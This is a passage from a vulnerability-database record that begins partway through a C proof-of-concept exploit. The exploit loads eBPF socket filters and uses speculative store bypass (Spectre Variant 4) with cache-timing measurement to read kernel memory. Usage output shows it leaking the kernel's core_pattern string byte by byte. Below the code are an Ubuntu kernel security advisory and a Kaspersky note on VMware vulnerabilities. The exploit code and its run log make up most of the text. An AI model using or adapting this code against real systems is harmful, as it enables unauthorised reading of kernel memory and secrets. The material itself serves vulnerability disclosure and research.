{\r\n char verifier_log[100000];\r\n union bpf_attr create_prog_attrs = {\r\n .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,\r\n .insn_cnt = insns_count,\r\n .insns = (uint64_t)insns,\r\n .license = (uint64_t)GPLv2,\r\n .log_level = 1,\r\n .log_size = sizeof(verifier_log),\r\n .log_buf = (uint64_t)verifier_log\r\n };\r\n int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs);\r\n int errno_ = errno;\r\n //printf(\"==========================\\n%s==========================\\n\",\r\nverifier_log);\r\n errno = errno_;\r\n if (progfd == -1)\r\n err(1, \"prog load\");\r\n return progfd;\r\n}\r\n \r\nint create_filtered_socket_fd(struct bpf_insn *insns, size_t insns_count) {\r\n int progfd = prog_load(insns, insns_count);\r\n \r\n // hook eBPF program up to a socket\r\n // sendmsg() to the socket will trigger the filter\r\n // returning 0 in the filter should toss the packet\r\n int socks[2];\r\n if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks))\r\n err(1, \"socketpair\");\r\n if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int)))\r\n err(1, \"setsockopt\");\r\n return socks[1];\r\n}\r\n \r\nvoid trigger_proc(int sockfd) {\r\n if (write(sockfd, \"X\", 1) != 1)\r\n err(1, \"write to proc socket failed\");\r\n}\r\n \r\nint input_map, leak_map;\r\nint sockfds[16];\r\n \r\nint leak_bit(unsigned long addr, int bit) {\r\n array_set_dw(input_map, 0, addr);\r\n int count_0 = 0, count_1 = 0;\r\n while (count_0 + count_1 < 100) {\r\n array_time_flush_loc(leak_map, 0, 2048+0x1000);\r\n trigger_proc(sockfds[bit+8]);\r\n unsigned int t1 = array_time_flush_loc(leak_map, 0, 2048+0x1000);\r\n \r\n array_time_flush_loc(leak_map, 0, 2048);\r\n trigger_proc(sockfds[bit+0]);\r\n unsigned int t0 = array_time_flush_loc(leak_map, 0, 2048);\r\n \r\n //printf(\"%u %u\\n\", t0, t1);\r\n if (t0 < 50)\r\n count_0++;\r\n if (t1 < 50)\r\n count_1++;\r\n }\r\n printf(\"%d vs %d\\n\", count_0, count_1);\r\n return (count_0 > count_1) ? 0 : 1;\r\n}\r\n \r\nint leak_byte(unsigned long addr) {\r\n int byte = 0;\r\n for (int bit=0; bit<8; bit++) {\r\n byte |= leak_bit(addr, bit)<<bit;\r\n }\r\n return byte;\r\n}\r\n \r\nint main(int argc, char **argv) {\r\n setbuf(stdout, NULL);\r\n input_map = array_create(8, 1);\r\n leak_map = array_create(0x3000, 1);\r\n \r\n if (argc != 3)\r\n errx(1, \"invocation (expects addr and length)\");\r\n \r\n #define BPF_REG_CONFUSED_SLOT BPF_REG_6\r\n #define BPF_REG_SLOW_SLOT BPF_REG_7\r\n #define BPF_REG_CONFUSED_SLOT_ALIAS BPF_REG_8\r\n #define BPF_REG_LEAK_ARRAY BPF_REG_9\r\n \r\n #define BPF_REG_CONFUSED BPF_REG_1\r\n #define BPF_REG_SECRET_VALUE BPF_REG_2\r\n #define BPF_REG_DUMMY_SLOT BPF_REG_3\r\n \r\n for (int i=0; i<16; i++) {\r\n bool dummy_ff = (i >= 8);\r\n int selected_bit = i & 7;\r\n struct bpf_insn insns[] = {\r\n /* setup: write 0x00 or 0xff to -216 to get a big stack\r\nallocation and to prepare dummy */\r\n BPF_ST_MEM(BPF_B, BPF_REG_FP, -216, dummy_ff ? 0x00 : 0xff),\r\n \r\n /* setup: compute stack slot pointers to :\r\n * - type-confused stack slot (at -72)\r\n * - pointer to type-confused stack slot (at -144)\r\n */\r\n BPF_MOV64_REG(BPF_REG_CONFUSED_SLOT, BPF_REG_FP),\r\n BPF_ALU64_IMM(BPF_ADD, BPF_REG_CONFUSED_SLOT, -72),\r\n BPF_MOV64_REG(BPF_REG_SLOW_SLOT, BPF_REG_FP),\r\n BPF_ALU64_IMM(BPF_ADD, BPF_REG_SLOW_SLOT, -144),\r\n //BPF_MOV64_REG(BPF_REG_0, BPF_REG_FP),\r\n //BPF_ALU64_IMM(BPF_ADD, BPF_REG_0, -216),\r\n \r\n /* write to dummy slot (to make a big stack and to permit later read) */\r\n //BPF_ST_MEM(BPF_DW, BPF_REG_0, 0, 0),\r\n \r\n /* setup: store victim memory pointer in BPF_REG_CONFUSED_SLOT */\r\n BPF_LD_MAP_FD(BPF_REG_ARG1, input_map),\r\n BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),\r\n BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4),\r\n BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 0),\r\n BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),\r\n BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),\r\n BPF_EXIT_INSN(),\r\n BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_0, 0),\r\n BPF_STX_MEM(BPF_DW, BPF_REG_CONFUSED_SLOT, BPF_REG_0, 0),\r\n \r\n /* setup: spill pointer to type-confused stack slot */\r\n BPF_STX_MEM(BPF_DW, BPF_REG_SLOW_SLOT, BPF_REG_CONFUSED_SLOT, 0),\r\n \r\n /* setup: load pointer to leak area into register */\r\n BPF_LD_MAP_FD(BPF_REG_ARG1, leak_map),\r\n BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),\r\n BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4),\r\n BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 0),\r\n BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),\r\n BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),\r\n BPF_EXIT_INSN(),\r\n BPF_ALU64_IMM(BPF_ADD, BPF_REG_0, 2048), /* leak_map+2048 */\r\n BPF_MOV64_REG(BPF_REG_LEAK_ARRAY, BPF_REG_0),\r\n \r\n /* CHEATED: fence and flush */\r\n BPF_MOV64_REG(BPF_REG_1, BPF_REG_SLOW_SLOT),\r\n BPF_EMIT_CALL(4/*clflush_mfence*/),\r\n \r\n BPF_MOV64_REG(BPF_REG_DUMMY_SLOT, BPF_REG_FP),\r\n BPF_ALU64_IMM(BPF_ADD, BPF_REG_DUMMY_SLOT, -216),\r\n \r\n /* START CRITICAL PATH */\r\n BPF_LDX_MEM(BPF_DW, BPF_REG_CONFUSED_SLOT_ALIAS,\r\nBPF_REG_SLOW_SLOT, 0), /* high-latency read of slot address */\r\n BPF_STX_MEM(BPF_DW, BPF_REG_CONFUSED_SLOT_ALIAS,\r\nBPF_REG_DUMMY_SLOT, 0), /* bypassed store via high-latency address */\r\n BPF_LDX_MEM(BPF_DW, BPF_REG_CONFUSED, BPF_REG_CONFUSED_SLOT, 0),\r\n \r\n BPF_LDX_MEM(BPF_B, BPF_REG_SECRET_VALUE, BPF_REG_CONFUSED, 0),\r\n BPF_ALU64_IMM(BPF_AND, BPF_REG_SECRET_VALUE, 1<<selected_bit),\r\n/* 0 or 1 */\r\n BPF_ALU64_IMM(BPF_LSH, BPF_REG_SECRET_VALUE, 12-selected_bit),\r\n/* 0 or 0x1000 */\r\n BPF_ALU64_REG(BPF_ADD, BPF_REG_LEAK_ARRAY, BPF_REG_SECRET_VALUE),\r\n BPF_LDX_MEM(BPF_B, BPF_REG_0, BPF_REG_LEAK_ARRAY, 0),\r\n /* END CRITICAL PATH */\r\n \r\n BPF_MOV64_IMM(BPF_REG_0, 0),\r\n BPF_EXIT_INSN()\r\n };\r\n sockfds[i] = create_filtered_socket_fd(insns, ARRSIZE(insns));\r\n puts(\"BPF PROG LOADED SUCCESSFULLY\");\r\n }\r\n \r\n/*\r\n puts(\"testing flushed...\\n\");\r\n for (int i=-1; i<10; i++) {\r\n unsigned int res = array_time_flush_loc(leak_map, 0, 2048);\r\n if (i >= 0)\r\n printf(\" %u\\n\", res);\r\n }\r\n*/\r\n \r\n unsigned long base_addr = strtoull(argv[1], NULL, 16);\r\n for (int i=0; i<atoi(argv[2]); i++) {\r\n unsigned long addr = base_addr + i;\r\n unsigned char leaked = leak_byte(addr);\r\n printf(\"%016lx: 0x%02hhx ('%c')\\n\", addr, leaked, leaked);\r\n }\r\n \r\n \r\n return 0;\r\n}\r\n \r\n*/\r\n----------------------- END -----------------------\r\n \r\nPoC usage:\r\n \r\n$ sudo grep core_pattern /proc/kallsyms\r\nffffffff9b2954e0 D core_pattern\r\n$ gcc -o bpf_store_skipper_assisted bpf_store_skipper_assisted.c\r\n$ time ./bpf_store_skipper_assisted ffffffff9b2954e0 5\r\nBPF PROG LOADED SUCCESSFULLY\r\nBPF PROG LOADED SUCCESSFULLY\r\nBPF PROG LOADED SUCCESSFULLY\r\nBPF PROG LOADED SUCCESSFULLY\r\nBPF PROG LOADED SUCCESSFULLY\r\nBPF PROG LOADED SUCCESSFULLY\r\nBPF PROG LOADED SUCCESSFULLY\r\nBPF PROG LOADED SUCCESSFULLY\r\nBPF PROG LOADED SUCCESSFULLY\r\nBPF PROG LOADED SUCCESSFULLY\r\nBPF PROG LOADED SUCCESSFULLY\r\nBPF PROG LOADED SUCCESSFULLY\r\nBPF PROG LOADED SUCCESSFULLY\r\nBPF PROG LOADED SUCCESSFULLY\r\nBPF PROG LOADED SUCCESSFULLY\r\nBPF PROG LOADED SUCCESSFULLY\r\n4 vs 96\r\n1 vs 99\r\n100 vs 0\r\n100 vs 0\r\n100 vs 0\r\n2 vs 98\r\n0 vs 100\r\n100 vs 0\r\nffffffff9b2954e0: 0x63 ('c')\r\n2 vs 98\r\n1 vs 99\r\n1 vs 99\r\n1 vs 99\r\n100 vs 0\r\n2 vs 98\r\n0 vs 100\r\n100 vs 0\r\nffffffff9b2954e1: 0x6f ('o')\r\n100 vs 0\r\n3 vs 97\r\n100 vs 0\r\n100 vs 0\r\n1 vs 99\r\n2 vs 98\r\n0 vs 100\r\n100 vs 0\r\nffffffff9b2954e2: 0x72 ('r')\r\n2 vs 98\r\n100 vs 0\r\n0 vs 100\r\n100 vs 0\r\n100 vs 0\r\n0 vs 100\r\n0 vs 100\r\n100 vs 0\r\nffffffff9b2954e3: 0x65 ('e')\r\n100 vs 0\r\n100 vs 0\r\n100 vs 0\r\n100 vs 0\r\n100 vs 0\r\n100 vs 0\r\n100 vs 0\r\n100 vs 0\r\nffffffff9b2954e4: 0x00 ('')\r\n \r\nreal 0m31.591s\r\nuser 0m2.547s\r\nsys 0m27.429s\r\n*/\n\n# 0day.today [2018-05-23] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30428"}], "ubuntu": [{"lastseen": "2019-04-14T06:57:20", "bulletinFamily": "unix", "description": "Jann Horn and Ken Johnson discovered that microprocessors utilizing speculative execution of a memory read may allow unauthorized memory reads via a sidechannel attack. This flaw is known as Spectre Variant 4. A local attacker could use this to expose sensitive information, including kernel memory. (CVE-2018-3639)\n\nJan H. Sch\u00f6nherr discovered that the Xen subsystem did not properly handle block IO merges correctly in some situations. An attacker in a guest vm could use this to cause a denial of service (host crash) or possibly gain administrative privileges in the host. (CVE-2017-12134)\n\nIt was discovered that the Bluetooth HIP Protocol implementation in the Linux kernel did not properly validate HID connection setup information. An attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-13220)\n\nIt was discovered that a buffer overread vulnerability existed in the keyring subsystem of the Linux kernel. A local attacker could possibly use this to expose sensitive information (kernel memory). (CVE-2017-13305)\n\nIt was discovered that the netlink subsystem in the Linux kernel did not properly restrict observations of netlink messages to the appropriate net namespace. A local attacker could use this to expose sensitive information (kernel netlink traffic). (CVE-2017-17449)\n\nIt was discovered that a race condition existed in the i8042 serial device driver implementation in the Linux kernel. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-18079)\n\nIt was discovered that a race condition existed in the Device Mapper component of the Linux kernel. A local attacker could use this to cause a denial of service (system crash). (CVE-2017-18203)\n\nIt was discovered that a race condition existed in the OCFS2 file system implementation in the Linux kernel. A local attacker could use this to cause a denial of service (kernel deadlock). (CVE-2017-18204)\n\nIt was discovered that an infinite loop could occur in the madvise(2) implementation in the Linux kernel in certain circumstances. A local attacker could use this to cause a denial of service (system hang). (CVE-2017-18208)\n\nKefeng Wang discovered that a race condition existed in the memory locking implementation in the Linux kernel. A local attacker could use this to cause a denial of service. (CVE-2017-18221)\n\nSilvio Cesare discovered a buffer overwrite existed in the NCPFS implementation in the Linux kernel. A remote attacker controlling a malicious NCPFS server could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-8822)", "modified": "2018-05-22T00:00:00", "published": "2018-05-22T00:00:00", "id": "USN-3655-1", "href": "https://usn.ubuntu.com/3655-1/", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "kaspersky": [{"lastseen": "2019-03-21T00:14:09", "bulletinFamily": "info", "description": "### *Detect date*:\n05/21/2018\n\n### *Severity*:\nWarning\n\n### *Description*:\nMultiple serious vulnerabilities have been found in VMware Workstation and Fusion. Malicious users can exploit these vulnerabilities to obtain sensitive information, gain privileges and cause denial of service.\n\n### *Affected products*:\nVMware Workstation earlier than 14.1.2 \nVMware Fusion earlier than 10.1.2\n\n### *Solution*:\nUpdate to latest version \n[Download VMware Fusion](<https://www.vmware.com/go/downloadfusion>) \n[Download Workstation](<https://www.vmware.com/go/downloadworkstation>)\n\n### *Original advisories*:\n[VMSA-2018-0013](<https://www.vmware.com/security/advisories/VMSA-2018-0013.html>) \n[VMSA-2018-0012](<https://www.vmware.com/security/advisories/VMSA-2018-0012.html>) \n\n\n### *Impacts*:\nOSI \n\n### *Related products*:\n[VMware Workstation](<https://threats.kaspersky.com/en/product/VMware-Workstation/>)\n\n### *CVE-IDS*:\n[CVE-2018-6962](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6962>)7.2Warning \n[CVE-2018-6963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6963>)2.1Warning \n[CVE-2018-3639](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3639>)4.9Warning", "modified": "2019-03-07T00:00:00", "published": "2018-05-21T00:00:00", "id": "KLA11258", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11258", "title": "\r KLA11258Multiple vulnerabilities in VMware Workstation and Fusion ", "type": "kaspersky", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}